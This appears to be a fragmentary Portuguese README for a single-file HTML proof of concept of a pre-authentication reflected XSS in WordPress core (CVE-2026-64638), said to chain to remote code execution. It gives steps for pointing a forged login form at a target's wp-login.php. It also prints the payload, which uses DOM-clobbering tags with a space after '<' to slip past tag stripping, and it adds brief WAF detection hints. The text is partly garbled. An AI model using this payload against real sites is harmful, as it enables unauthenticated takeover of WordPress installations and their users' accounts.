
Prova de conceito em HTML de arquivo único para XSS refletido pré-autenticação no WordPress (CVE-2026-64638), demonstrando execução de JavaScript não autenticado e uma cadeia de XSS para RCE via DOM clobbering e upload de senha de aplicativo.
Prova de Conceito de XSS Refletido Pré-Autenticação no WordPress
Prova de conceito em HTML de arquivo único para o XSS por diferença de parser CVE-2026-64638 (XSS2Shell) no núcleo do WordPress. Demonstra a execução de JavaScript sem autenticação na origem do WordPress por meio de uma requisição de login forjada.
strip_tags() vs wp_kses_post())POC.html em um editor de texto.http://TARGET/wp-login.php no action do formulário pelo seu alvo.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (ou alert()) é disparado na origem do WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
O espaço após cada < é o exploit. Sem ele, wp_strip_all_tags() remove tudo.
%3C + espaço em branco no campo log no WAF/edge.POST /wp-login.php em que log contenha um < codificado.